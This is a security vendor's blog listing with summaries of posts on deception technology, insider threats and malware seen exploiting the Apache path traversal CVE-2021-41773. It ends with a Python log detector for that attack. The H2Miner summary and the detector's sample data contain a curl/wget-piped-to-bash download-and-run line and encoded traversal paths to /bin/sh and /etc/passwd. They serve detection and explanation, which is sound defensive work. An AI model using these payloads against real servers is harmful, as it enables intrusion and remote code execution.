Blog  

Our blog is a playground with fresh ideas about security and our approach

14 Dec

Top 5 Most-Read Articles of 2021

Curious about which posts were the most popular this year here at CounterCraft? From highly technical posts with practical applications to in-depth looks at deception technology, our blog featured all manner of articles written by experts in the field. Read on for the best of what everyone was reading on our website in 2021.

Shellcode Detection Using Real-Time Kernel Monitoring

This article, written by Alonso Candado, a security software engineer here at CounterCraft, is a quick overview of how to detect shellcode from the kernel in real time, illustrated with specific examples.

10 Dec

From the Files: The Original Omicron Virus

Many members of our team have been in cybersecurity for some time now. With the recent news about the latest COVID variant, the oldest of us were reminded of the curious tale of the “original” Omicron virus. Sit back and relax for a vintage cybersecurity tale from Fernando Braquehais, founder and head of development. A few days ago, while revising a colleague’s merge request, the Omicron variant of COVID-19 came up. I mentioned what a huge coincidence it was that this variant had the world turned upside down exactly like the famed Flip/Omicron computer virus from decades ago.

7 Dec

blueheaven: Command and Control Malware

The Internet is plagued by automated systems scanning for vulnerable machines to attack, in the hope of compromising them or harvesting exploitable information. In this blog post, we analyze an attack we detected in one of our internet-facing deception environments: the blueheaven malware. This group exploited CVE-2021-41773, the Apache HTTP Server path traversal vulnerability.

blueheaven

This actor’s domain was purchased on 30 October 2021. The operation is built on a botnet that attacks servers with known vulnerabilities; its main objective is to obtain a shell on each victim, execute commands, and install its malware.

2 Dec

Digital Twin: Finding the Digital Adversary Before They Find You

Are you wondering which solutions really give your organization a strong, resilient posture against the digital adversary? Read on to discover how digital twin environments let you clone your organization’s operational infrastructure and behaviors in order to draw, deter, detect, document, and defend against cyberattacks. The cybersecurity landscape is an ever-changing environment composed of threat actors and cyber weapons. The ability to lure the digital adversary into an environment where you can detect and defend against these attacks is known as threat deception.

1 Dec

Insider Threats: Five Indicators of Risk & What to Do

Insiders are undoubtedly one of the most concerning threat actors when it comes to establishing a solid cybersecurity posture, because they are not easily identified by patterns, baselines or known behavior. This makes them the most difficult threat actors to catch. By definition, they have inside knowledge of the network architecture, legitimate credentials to reach their objectives, and plenty of time to plan their next move.

30 Nov

What We're Reading

Some interesting and even quirky pieces caught our eye this month. Read on for the news we’ve been following and chatting about around the proverbial water cooler.

Microsoft Engineer Says Attackers Don’t Bother Brute-forcing Long Passwords

Ross Bevington, a security researcher at Microsoft, used data gathered from a network of honeypot servers to study how threat actors behave against those servers. One of the interesting findings from this deception decoy setup was that 77% of brute force attempts used passwords of six numerals or fewer.

26 Nov

Deception Tops List of Technologies in 2021 IDG Security Priorities Study

From ransomware to malware affecting critical infrastructure, cyber attacks are more mainstream and more damaging than ever. Keeping up with all the attack vectors and evolving threats gets more challenging by the day. IDG’s recently released 2021 Security Priorities study is an important look at the state of security strategies today. This 2021 report provides an in-depth look at the security landscape today from the valuable viewpoint of its top leaders and decision makers.

23 Nov

CounterCraft Named Overall Leader by KuppingerCole

KuppingerCole recently named CounterCraft as an overall leader in their Distributed Deception Platforms Leadership Compass report. CounterCraft appears as an Overall Leader, a Product Leader, and an Innovation Leader. The report, written by John Tolbert, provides an overview of the market for Distributed Deception Platforms (DDPs) and provides a compass to help guide businesses on their solutions. KuppingerCole examines the market segment, vendor service functionality, relative market share, and innovative approaches to providing DDP solutions.

18 Nov

NIST Documents Highlight Deception Technology

Today information security (infosec) and cybersecurity are quickly becoming a top priority for organizations. As they should: there are an estimated 200 Advanced Persistent Threat (APT) groups globally, with new ones popping up every day. Attackers range from script kiddies to sophisticated technical experts, whether backed by foreign nations looking to disrupt our way of life for political gain or operating as cybercriminals attacking organizations for monetary gain. In fact, per Accenture, in 2019 the average cost of cybercrime for an organization was $13 million.

16 Nov

CVE-2021-41773 Actively Exploited by H2Miner

Cloud computing has its share of major security threats, and some of them are both consistent and insistent. One of them is the H2Miner/Kinsing malware. The people behind it use high-severity public vulnerabilities to keep installing their RAT and miner, the most recent being the Apache path traversal CVE-2021-41773, the latest vulnerability added to their already expansive portfolio. In this case they look for servers with mod_cgi enabled, so that they can infect the server directly by running a simple (curl -s URL||wget -q -O- URL) | bash command which, if successful, compromises the host and even returns the script output in the HTTP response.
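The two halves of the attack described above (an encoded dot-segment traversal out of the mod_cgi directory, then a download-and-run one-liner) are both visible to a defender. The following detector is an added example, not CounterCraft’s code or anything from the H2Miner analysis: it normalizes request paths from Apache combined-format access-log lines, resolves where the traversal would land, and separately flags request bodies that carry the curl-or-wget-piped-to-a-shell shape. The log lines, IP addresses and URL are constructed for illustration; the function and field names are this example’s own.

```python
"""Detect CVE-2021-41773 exploitation attempts in Apache access-log lines.

Added example (not CounterCraft's or H2Miner's code). Assumptions: Apache
combined log format, CGI scripts served from /cgi-bin/ via mod_cgi, and the
curl||wget ... | bash payload shape described in the post. Sample log lines
and the request body below are constructed, with documentation-range IPs.
"""
import posixpath
import re
from urllib.parse import unquote

# Leading fields of the Apache combined log format; referrer/UA are optional here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Download-and-run shape named in the post: curl or wget (with or without a
# "||" fallback) whose output is piped into sh/bash.
DOWNLOAD_AND_RUN_RE = re.compile(r'\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b')


def decode_path(raw_path):
    """Percent-decode repeatedly (bounded) so '.%2e' and '%2e%2e' collapse to the
    literal '..' that the vulnerable Apache 2.4.49 normalizer failed to see."""
    path = raw_path.split('?', 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Return a finding dict for a traversal attempt, or None for benign/unparsed lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path = m['path']
    decoded = decode_path(raw_path)
    if '..' not in decoded.split('/'):
        return None                      # no dot-segment traversal at all
    # Where the request would land if the server honoured the traversal.
    resolved = posixpath.normpath(decoded)
    via_cgi = decoded.startswith('/cgi-bin/')
    if via_cgi and resolved.startswith(('/bin/', '/usr/bin/')):
        kind = 'rce-attempt'             # mod_cgi would execute e.g. /bin/sh
    else:
        kind = 'file-read-attempt'       # e.g. /etc/passwd outside the docroot
    return {
        'ip': m['ip'],
        'method': m['method'],
        'status': int(m['status']),
        'raw_path': raw_path,
        'resolved': resolved,
        'kind': kind,
        'encoded': '%2e' in raw_path.lower(),
        'likely_success': m['status'] == '200',   # 403/400 means it was refused
    }


def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [hit for hit in map(classify, lines) if hit]


def is_download_and_run(body):
    """True if a request body (or captured shell input) fetches a script and pipes it to a shell."""
    return bool(DOWNLOAD_AND_RUN_RE.search(body))


# Constructed sample traffic: two traversal attempts and two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2021:10:15:23 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 512',
    '198.51.100.9 - - [16/Nov/2021:10:16:01 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199',
    '192.0.2.44 - - [16/Nov/2021:10:17:40 +0000] "GET /index.html HTTP/1.1" 200 3021',
    '192.0.2.44 - - [16/Nov/2021:10:17:41 +0000] "GET /cgi-bin/status.cgi?host=web01 HTTP/1.1" 200 88',
]

# Constructed POST body in the shape the post describes (URL is a placeholder).
SAMPLE_BODY = '(curl -s http://203.0.113.5/x.sh||wget -q -O- http://203.0.113.5/x.sh) | bash'

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['kind']:18} {hit['ip']:14} {hit['raw_path']} -> {hit['resolved']} "
              f"(status {hit['status']}, likely_success={hit['likely_success']})")
    print('payload body flagged:', is_download_and_run(SAMPLE_BODY))
```

Access logs do not record POST bodies, so is_download_and_run() needs a body source such as a WAF audit log or the full request capture a deception environment keeps; the path check alone still catches the traversal, and a 200 on a request that resolves to /bin/sh is the signal worth paging on. Only a server that actually honours the traversal is exploitable, so a 400 or 403 on these paths indicates a patched httpd refusing the request rather than a compromise.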